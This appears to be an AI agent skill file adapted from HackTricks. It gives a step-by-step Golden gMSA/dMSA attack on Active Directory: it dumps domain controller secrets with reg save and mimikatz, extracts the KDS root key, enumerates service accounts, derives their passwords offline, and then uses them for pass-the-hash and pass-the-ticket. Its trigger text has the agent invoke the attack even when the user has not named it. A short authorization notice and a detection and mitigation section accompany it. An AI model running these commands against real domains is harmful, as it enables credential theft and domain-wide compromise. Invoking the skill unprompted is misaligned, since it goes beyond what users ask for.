Hacktricks-skills golden-gmsa-dmsa-attack

Execute Golden gMSA/dMSA attacks to derive managed service account passwords offline. Use this skill whenever the user mentions gMSA, dMSA, managed service accounts, KDS root key extraction, or wants to compute service account passwords from Active Directory. Trigger for any Active Directory attack involving service account password derivation, even if the user doesn't explicitly name the attack.

install

source · Clone the upstream repo

git clone https://github.com/abelrguezr/hacktricks-skills

manifest: skills/windows-hardening/active-directory-methodology/golden-dmsa-gmsa/SKILL.MD

source content

Golden gMSA/dMSA Attack Methodology

This skill guides you through the Golden gMSA/dMSA attack - an offline password derivation technique for Windows Managed Service Accounts that bypasses normal authentication auditing.

⚠️ Authorization Required

This methodology is for authorized security testing only. Ensure you have:

Written authorization from the organization
Proper scope documentation
Legal clearance for Active Directory attacks

Attack Overview

Managed Service Accounts (gMSA/dMSA) store passwords differently than regular accounts. The password is derived on-the-fly from three inputs:

KDS Root Key - Forest-wide secret replicated to all Domain Controllers
Account SID - The service account's security identifier
ManagedPasswordID - Per-account GUID in
```
msDS-ManagedPasswordId
```

Derivation formula:

AES256_HMAC(KDSRootKey, SID || ManagedPasswordID)

→ 240-byte base64 blob

If you obtain all three inputs, you can compute valid current and future passwords for any gMSA/dMSA in the forest offline, bypassing:

LDAP read auditing
Password change intervals
Kerberos traffic monitoring

Prerequisites Checklist

Before proceeding, verify:

Forest-level compromise of at least one DC (or Enterprise Admin)
SYSTEM access to a DC, or ability to dump DC secrets
.NET ≥ 4.7.2 x64 environment for tooling
Network access to enumerate service accounts (LDAP or RID brute-force)

Phase 1: Extract the KDS Root Key

The KDS Root Key is stored in the DC's registry under:

CN=Master Root Keys,CN=Group Key Distribution Service,CN=Services,CN=Configuration,<Forest>

Method A: Direct DC Access (Volume Shadow Copy)

# On the compromised DC
reg save HKLM\SECURITY security.hive
reg save HKLM\SYSTEM system.hive

# Extract with mimikatz
mimikatz # lsadump::secrets
mimikatz # lsadump::trust /patch

Method B: GoldenDMSA Tool (Remote)

# Query KDS root keys from any DC in the forest
GoldendMSA.exe kds --domain <domain.fqdn>

# Or without domain flag if already authenticated
GoldendMSA.exe kds

Method C: GoldenGMSA Tool

GoldenGMSA.exe kdsinfo

Output to capture: The base64

RootKey

string with its GUID name (e.g.,

RootKey: <GUID> = <base64-string>

)

Phase 2: Enumerate gMSA/dMSA Objects

You need three attributes per account:

```
sAMAccountName
```
- Account name
```
objectSid
```
- Security identifier
```
msDS-ManagedPasswordId
```
- Password derivation GUID

Method A: PowerShell (Authenticated)

Get-ADServiceAccount -Filter * -Properties msDS-ManagedPasswordId | \
  Select-Object sAMAccountName, objectSid, msDS-ManagedPasswordId | \
  Export-Csv gmsa-enumeration.csv -NoTypeInformation

Method B: GoldenDMSA LDAP Enumeration

# Kerberos or simple bind
GoldendMSA.exe info -d example.local -m ldap

Method C: GoldenDMSA RID Brute-Force

Use when anonymous binds are blocked:

GoldendMSA.exe info -d example.local -m brute -r 5000 -u <username> -p <password>

Method D: GoldenGMSA

GoldenGMSA.exe gmsainfo

Phase 3: Discover ManagedPasswordID (When Missing)

Some deployments strip

msDS-ManagedPasswordId

from ACL-protected reads. The GUID structure allows narrow wordlist generation:

First 32 bits = Unix epoch time of account creation (minutes resolution)
Remaining 96 bits = Random

Generate Wordlist and Test

GoldendMSA.exe wordlist -s <SID> -d example.local -f example.local -k <KDSKeyGUID>

The tool:

Generates candidate GUIDs based on account creation time
Computes candidate passwords
Compares base64 blobs against
```
msDS-ManagedPassword
```
attribute
Returns the matching GUID

Phase 4: Offline Password Computation

Once you have all three inputs, derive the password:

GoldenDMSA

GoldendMSA.exe compute \
  -s <SID> \
  -k <KDSRootKey> \
  -d example.local \
  -m <ManagedPasswordID> \
  -i <KDSRootKeyID>

GoldenGMSA

GoldenGMSA.exe compute \
  --sid <SID> \
  --kdskey <KDSRootKey> \
  --pwdid <ManagedPasswordID>

Output Format

The tool outputs the derived password in base64 format, which can be:

Converted to NTLM hash
Used directly with mimikatz
```
sekurlsa::pth
```
Converted to AES keys for Rubeus Kerberos abuse

Post-Exploitation: Password Injection

Mimikatz Pass-the-Hash

mimikatz # sekurlsa::pth /user:<gmsa-name> /domain:<domain> /ntlm:<hash>

Rubeus Pass-the-Ticket

Rubeus.exe ptt /ticket:<base64-ticket>

Detection & Mitigation

What Defenders Should Monitor

Indicator	Detection Method
DC registry hive dumps	Monitor `reg save` commands, Volume Shadow Copy creation
KDS Root Key access	Audit `CN=Master Root Keys` container reads
DSRM usage	Alert on Directory Services Restore Mode activation
Unusual service password reuse	Detect same password across multiple hosts
Base64 password writes	Monitor `msDS-ManagedPassword` attribute changes

Mitigation Recommendations

Restrict DC backup capabilities to Tier-0 administrators only
Monitor DSRM and VSS creation on all Domain Controllers
Audit KDS Root Key container access in Active Directory
Convert high-privilege gMSAs to classic service accounts where Tier-0 isolation isn't possible
Implement privileged access workstations for DC administration

Tooling Reference

Tool	Purpose	Repository
GoldenDMSA	Primary attack tool	https://github.com/Semperis/GoldenDMSA
GoldenGMSA	Alternative implementation	https://github.com/Semperis/GoldenGMSA
Mimikatz	Secret extraction, PTH	https://github.com/gentilkiwi/mimikatz
Rubeus	Kerberos abuse, PTT	https://github.com/GhostPack/Rubeus